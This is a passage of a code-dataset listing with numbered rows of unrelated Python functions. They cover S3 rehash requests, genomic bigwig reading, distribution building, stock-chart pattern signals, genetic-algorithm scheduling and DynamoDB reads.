"ApiCallRouterWithApprovalChecksWithRobotAccess",
api_call_router_with_approval_checks
.ApiCallRouterWithApprovalChecksWithRobotAccess)
api_call_router_registry.RegisterApiCallRouter(
"ApiCallRouterWithApprovalChecksWithoutRobotAccess",
api_call_router_with_approval_checks
.ApiCallRouterWithApprovalChecksWithoutRobotAccess)
api_call_router_registry.RegisterApiCallRouter(
"ApiCallRouterWithoutChecks",
api_call_router_without_checks.ApiCallRouterWithoutChecks)
api_call_router_registry.RegisterApiCallRouter(
"ApiLabelsRestrictedCallRouter",
api_labels_restricted_call_router.ApiLabelsRestrictedCallRouter)
api_call_router_registry.RegisterApiCallRouter("ApiRootRouter",
api_root_router.ApiRootRouter)
api_call_router_registry.RegisterApiCallRouter(
"DisabledApiCallRouter", api_call_router.DisabledApiCallRouter)
# keep-sorted end
| 5,786 |
def do_request(batch_no, req):
"""execute one request. tail the logs. wait for completion"""
tmp_src = _s3_split_url(req['input'])
cpy_dst = _s3_split_url(req['output'])
new_req = {
"src_bucket": tmp_src[0],
"src_key": tmp_src[1],
"dst_bucket": cpy_dst[0],
"dst_key": cpy_dst[1],
"digests": req["digests"]
}
delete_mismatch = req.get('delete_mismatch', False)
log.info("REQ%s data-rehash request: %s", batch_no, json.dumps(new_req, sort_keys=True, indent=4, separators=(",", ": ")))
code, response = lambdas.invoke_sync(lambdas.DATA_REHASH, Payload=new_req)
data = response['Payload'].read().decode("ascii")
if code != 0:
raise Exception("data-rehash failed to complete: %s" % (data,))
data_obj = json.loads(data)
if data_obj.get('error', None):
if "mismatch" in data_obj['error']:
session = boto3.session.Session()
s3 = session.client('s3', config=botocore.config.Config(read_timeout=300, retries={'max_attempts': 0}))
log.info("REQ%s deleting mismatchfile: Bucket=%s Key=%s", batch_no, tmp_src[0], tmp_src[1])
try:
s3.delete_object(Bucket=tmp_src[0], Key=tmp_src[1])
except Exception as delete_exc:
log.error("REQ%s delete failed", exc_info=delete_exc)
raise Exception("data-rehash returned an error: %s" % (data_obj,))
return data_obj
| 5,787 |
def bigwig_tss_targets(wig_file, tss_list, seq_coords, pool_width=1):
""" Read gene target values from a bigwig
Args:
wig_file: Bigwig filename
tss_list: list of TSS instances
seq_coords: list of (chrom,start,end) sequence coordinates
pool_width: average pool adjacent nucleotides of this width
Returns:
tss_targets:
"""
# initialize target values
tss_targets = np.zeros(len(tss_list), dtype="float16")
# open wig
wig_in = pyBigWig.open(wig_file)
# warn about missing chromosomes just once
warned_chroms = set()
# for each TSS
for tss_i in range(len(tss_list)):
tss = tss_list[tss_i]
# extract sequence coordinates
seq_chrom, seq_start, seq_end = seq_coords[tss.gene_seq]
# determine bin coordinates
tss_bin = (tss.pos - seq_start) // pool_width
bin_start = seq_start + tss_bin * pool_width
bin_end = bin_start + pool_width
# pull values
try:
tss_targets[tss_i] = np.array(
wig_in.values(seq_chrom, bin_start, bin_end), dtype="float32"
).sum()
except RuntimeError:
if seq_chrom not in warned_chroms:
print(
"WARNING: %s doesn't see %s (%s:%d-%d). Setting to all zeros. No additional warnings will be offered for %s"
% (
wig_file,
tss.identifier,
seq_chrom,
seq_start,
seq_end,
seq_chrom,
),
file=sys.stderr,
)
warned_chroms.add(seq_chrom)
# check NaN
if np.isnan(tss_targets[tss_i]):
print(
"WARNING: %s (%s:%d-%d) pulled NaN from %s. Setting to zero."
% (tss.identifier, seq_chrom, seq_start, seq_end, wig_file),
file=sys.stderr,
)
tss_targets[tss_i] = 0
# close wig file
wig_in.close()
return tss_targets
| 5,788 |
def _robot_barcode(event: Message) -> str:
"""Extracts a robot barcode from an event message.
Args:
event (Message): The event
Returns:
str: robot barcode
"""
return str(
next(
subject["friendly_name"] # type: ignore
for subject in event.message["event"]["subjects"] # type: ignore
if subject["role_type"] == "robot" # type: ignore
)
)
| 5,789 |
def build_dist(srcdir, destdir='.', build_type='bdist_egg'):
"""
Builds a distribution using the specified source directory and places
it in the specified destination directory.
srcdir: str
Source directory for the distribution to be built.
destdir: str
Directory where the built distribution file will be placed.
build_type: str
The type of distribution to be built. Default is 'bdist_egg'.
"""
startdir = os.getcwd()
destdir = os.path.abspath(os.path.expanduser(destdir)).replace('\\','/')
srcdir = os.path.abspath(os.path.expanduser(srcdir)).replace('\\','/')
setupname = os.path.join(srcdir, 'setup.py')
if not has_setuptools():
setupname = make_new_setupfile(setupname)
dirfiles = set(os.listdir(destdir))
print "building distribution in %s" % srcdir
cmd = [sys.executable.replace('\\','/'),
os.path.basename(setupname),
]
cmd.extend(build_type.split(' '))
cmd.extend(['-d', destdir])
os.chdir(srcdir)
# FIXME: fabric barfs when running this remotely due to some unicode
# output that it can't handle, so we first save the output to
# a file with unicode stripped out
out = codecs.open('_build_.out', 'wb',
encoding='ascii', errors='replace')
print 'running command: %s' % ' '.join(cmd)
try:
p = subprocess.Popen(' '.join(cmd),
stdout=out, stderr=subprocess.STDOUT,
shell=True)
p.wait()
finally:
out.close()
with open('_build_.out', 'r') as f:
print f.read()
os.chdir(startdir)
newfiles = set(os.listdir(destdir)) - dirfiles
if len(newfiles) != 1:
raise RuntimeError("expected one new file in in destination directory but found %s" %
list(newfiles))
if p.returncode != 0:
raise RuntimeError("problem building distribution in %s. (return code = %s)" %
(srcdir, p.returncode))
distfile = os.path.join(destdir, newfiles.pop())
print 'new distribution file is %s' % distfile
return distfile
| 5,790 |
def check_thirteen_fd(fds: List[Union[BI, FakeBI]]) -> str:
"""识别十三段形态
:param fds: list
由远及近的十三段形态
:return: str
"""
v = Signals.Other.value
if len(fds) != 13:
return v
direction = fds[-1].direction
fd1, fd2, fd3, fd4, fd5, fd6, fd7, fd8, fd9, fd10, fd11, fd12, fd13 = fds
max_high = max([x.high for x in fds])
min_low = min([x.low for x in fds])
if direction == Direction.Down:
if min_low == fd13.low and max_high == fd1.high:
# aAbBc式底背驰,fd2-fd6构成A,fd8-fd12构成B
if min(fd2.high, fd4.high, fd6.high) > max(fd2.low, fd4.low, fd6.low) > fd8.high \
and min(fd8.high, fd10.high, fd12.high) > max(fd8.low, fd10.low, fd12.low) \
and min(fd2.low, fd4.low, fd6.low) > max(fd8.high, fd10.high, fd12.high) \
and fd13.power < fd7.power:
v = Signals.LA0.value
# ABC式底背驰,A5B3C5
if fd5.low < min(fd1.low, fd3.low) and fd9.high > max(fd11.high, fd13.high) \
and fd8.high > fd6.low and fd1.high - fd5.low > fd9.high - fd13.low:
v = Signals.LA0.value
if fd13.power < max(fd11.power, fd9.power):
v = Signals.LB0.value
# ABC式底背驰,A3B5C5
if fd3.low < min(fd1.low, fd5.low) and fd9.high > max(fd11.high, fd13.high) \
and min(fd4.high, fd6.high, fd8.high) > max(fd4.low, fd6.low, fd8.low) \
and fd1.high - fd3.low > fd9.high - fd13.low:
v = Signals.LA0.value
if fd13.power < max(fd11.power, fd9.power):
v = Signals.LB0.value
# ABC式底背驰,A5B5C3
if fd5.low < min(fd1.low, fd3.low) and fd11.high > max(fd9.high, fd13.high) \
and min(fd6.high, fd8.high, fd10.high) > max(fd6.low, fd8.low, fd10.low) \
and fd1.high - fd5.low > fd11.high - fd13.low:
v = Signals.LA0.value
if fd13.power < fd11.power:
v = Signals.LB0.value
elif direction == Direction.Up:
if max_high == fd13.high and min_low == fd1.low:
# aAbBC式顶背驰,fd2-fd6构成A,fd8-fd12构成B
if fd8.low > min(fd2.high, fd4.high, fd6.high) >= max(fd2.low, fd4.low, fd6.low) \
and min(fd8.high, fd10.high, fd12.high) >= max(fd8.low, fd10.low, fd12.low) \
and max(fd2.high, fd4.high, fd6.high) < min(fd8.low, fd10.low, fd12.low) \
and fd13.power < fd7.power:
v = Signals.SA0.value
# ABC式顶背驰,A5B3C5
if fd5.high > max(fd3.high, fd1.high) and fd9.low < min(fd11.low, fd13.low) \
and fd8.low < fd6.high and fd5.high - fd1.low > fd13.high - fd9.low:
v = Signals.SA0.value
# C内部顶背驰,形成双重顶背驰
if fd13.power < max(fd11.power, fd9.power):
v = Signals.SB0.value
# ABC式顶背驰,A3B5C5
if fd3.high > max(fd5.high, fd1.high) and fd9.low < min(fd11.low, fd13.low) \
and min(fd4.high, fd6.high, fd8.high) > max(fd4.low, fd6.low, fd8.low) \
and fd3.high - fd1.low > fd13.high - fd9.low:
v = Signals.SA0.value
# C内部顶背驰,形成双重顶背驰
if fd13.power < max(fd11.power, fd9.power):
v = Signals.SB0.value
# ABC式顶背驰,A5B5C3
if fd5.high > max(fd3.high, fd1.high) and fd11.low < min(fd9.low, fd13.low) \
and min(fd6.high, fd8.high, fd10.high) > max(fd6.low, fd8.low, fd10.low) \
and fd5.high - fd1.low > fd13.high - fd11.low:
v = Signals.SA0.value
# C内部顶背驰,形成双重顶背驰
if fd13.power < fd11.power:
v = Signals.SB0.value
else:
raise ValueError("direction 的取值错误")
return v
| 5,791 |
def set_process_tracking(template: str, channels: List[str]) -> str:
"""This function replaces the template placeholder for the process tracking with the correct process tracking.
Args:
template: The template to be modified.
channels: The list of channels to be used.
Returns:
The modified template.
"""
tracking = ""
for channel in channels:
tracking += " ULong64_t {ch}_processed = 0;\n".format(ch=channel)
tracking += " std::mutex {ch}_bar_mutex;\n".format(ch=channel)
tracking += " auto c_{ch} = {ch}_df_final.Count();\n".format(ch=channel)
tracking += " c_{ch}.OnPartialResultSlot(quantile, [&{ch}_bar_mutex, &{ch}_processed, &quantile](unsigned int /*slot*/, ULong64_t /*_c*/) {{".format(
ch=channel
)
tracking += (
"\n std::lock_guard<std::mutex> lg({ch}_bar_mutex);\n".format(
ch=channel
)
)
tracking += " {ch}_processed += quantile;\n".format(ch=channel)
tracking += ' Logger::get("main - {ch} Channel")->info("{{}} Events processed ...", {ch}_processed);\n'.format(
ch=channel
)
tracking += " });\n"
return template.replace("{PROGRESS_CALLBACK}", tracking)
| 5,792 |
def solve(instance: Instance) -> InstanceSolution:
"""Solves the P||Cmax problem by using a genetic algorithm.
:param instance: valid problem instance
:return: generated solution of a given problem instance
"""
generations = 512
population_size = 128
best_specimens_number = 32
generator = solution_generator(instance, population_size, best_specimens_number)
best_solution = GeneticSolution(instance, [0 for _ in range(len(instance.tasks_durations))])
for _, solution in zip(range(generations), generator):
best_solution = min(best_solution, solution, key=lambda x: x.total_time)
return best_solution.to_instance_solution()
| 5,793 |
def cube_disp_data(self,vmin=None,vmax=None,cmap=pylab.cm.hot,var=False):
"""
Display the datacube as the stack of all its spectra
@param vmin: low cut in the image for the display (if None, it is 'smartly' computed)
@param vmax: high cut in the image for the display (if None, it is 'smartly' computed)
@param var: Variance flag. If set to True, the variance slice is displayed.
@param cmap: Colormap in pylab syntax
"""
if var:
data = self.var
else:
data = self.data
med = float(num.median(num.ravel(data)))
disp = float(num.sqrt(num.median((num.ravel(data)-med)**2)))
if vmin is None:
vmin = med - 3*disp
if vmax is None:
vmax = med + 10*disp
extent = [self.lstart,self.lend,-1./2.,self.nlens-1./2.]
pylab.imshow(num.transpose(self.data),vmin=vmin,vmax=vmax,extent=extent,
interpolation='nearest',aspect='auto')
| 5,794 |
def payee_transaction():
"""Last transaction for the given payee."""
entry = g.ledger.attributes.payee_transaction(request.args.get("payee"))
return serialise(entry)
| 5,795 |
def datasheet_check(part):
"""Datasheet check"""
if part.datasheet == "":
return # Blank datasheet ok
assert part.datasheet.startswith("http"), "'{}' is an invalid URL".format(part.datasheet)
code = check_ds_link(part.datasheet)
assert code in (200,301,302), "link '{}' BROKEN, error code '{}'".format(part.datasheet, code)
| 5,796 |
def represent(element: Element) -> str:
"""Represent the regular expression as a string pattern."""
return _Representer().visit(element)
| 5,797 |
def read_dynamo_table(gc, name, read_throughput=None, splits=None):
"""
Reads a Dynamo table as a Glue DynamicFrame.
:param awsglue.context.GlueContext gc: The GlueContext
:param str name: The name of the Dynamo table
:param str read_throughput: Optional read throughput - supports values from "0.1" to "1.5", inclusive.
:param str splits: Optional number of input splits - defaults to the SparkContext default parallelism.
:rtype: awsglue.dynamicframe.DynamicFrame
"""
connection_options = {
'dynamodb.input.tableName': name,
'dynamodb.splits': str(splits or gc.spark_session.sparkContext.defaultParallelism)
}
if read_throughput:
connection_options['dynamodb.throughput.read.percent'] = str(read_throughput)
return gc.create_dynamic_frame_from_options(connection_type='dynamodb', connection_options=connection_options)
| 5,798 |
def convert_to_bytes(text):
"""
Converts `text` to bytes (if it's not already).
Used when generating tfrecords. More specifically, in function call `tf.train.BytesList(value=[<bytes1>, <bytes2>, ...])`
"""
if six.PY2:
return convert_to_str(text) # In python2, str is byte
elif six.PY3:
if isinstance(text, bytes):
return text
else:
return convert_to_unicode(text).encode('utf-8')
else:
raise ValueError("Not running on Python2 or Python 3?")
| 5,799 |
Subsets and Splits
No community queries yet
The top public SQL queries from the community will appear here once available.